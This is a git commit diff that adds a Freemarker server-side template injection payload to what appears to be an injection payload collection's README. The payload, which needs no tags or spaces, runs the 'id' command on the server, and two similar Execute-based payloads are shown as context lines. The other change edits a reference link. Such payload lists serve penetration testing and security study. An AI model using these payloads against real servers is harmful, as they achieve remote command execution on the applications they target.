Merge pull request #75 from scarvell/master

Added Freemarker SSTI PoC that doesn't require the use of "tags"/spaces
2024-12-18 18:36:10 +00:00 · 2019-06-24 14:32:11 +02:00 · 2019-06-24 14:32:11 +02:00 · 1cec6e9a35
commit 1cec6e9a35
parent 9be62677b6 601db0e188
1 changed files with 2 additions and 1 deletions
--- a/Injection/README.md
+++ b/Injection/README.md
@ -150,6 +150,7 @@ The template can be `${3*3}` or the legacy `#{3*3}`
 ```js
 <#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
 [#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
+${"freemarker.template.utility.Execute"?new()("id")}
 ```

 ## Jade / Codepen
@ -334,4 +335,4 @@ Fixed by https://github.com/HubSpot/jinjava/pull/230
 * [RCE in Hubspot with EL injection in HubL - @fyoorer](https://www.betterhacker.com/2018/12/rce-in-hubspot-with-el-injection-in-hubl.html?spref=tw)
 * [Jinja2 template injection filter bypasses - @gehaxelt, @0daywork](https://0day.work/jinja2-template-injection-filter-bypasses/)
 * [Gaining Shell using Server Side Template Injection (SSTI) - David Valles - Aug 22, 2018](https://medium.com/@david.valles/gaining-shell-using-server-side-template-injection-ssti-81e29bb8e0f9)
-* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)
+* [EXPLOITING SERVER SIDE TEMPLATE INJECTION WITH TPLMAP - BY: DIVINE SELORM TSA - 18 AUG 2018](https://www.owasp.org/images/7/7e/Owasp_SSTI_final.pdf)